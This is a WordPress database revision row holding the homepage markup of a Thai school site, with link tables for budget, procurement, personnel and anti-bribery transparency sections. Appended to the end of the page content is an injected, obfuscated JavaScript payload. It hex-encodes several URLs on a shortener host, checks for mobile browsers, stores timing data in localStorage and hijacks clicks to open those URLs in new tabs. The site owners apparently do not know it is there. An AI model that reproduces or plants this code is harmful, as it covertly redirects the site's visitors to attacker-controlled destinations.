900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:08:10','2024-07-27 05:08:10','',14,'http://pakhaeng.ssk.in.th/?p=132',0,'revision','',0),
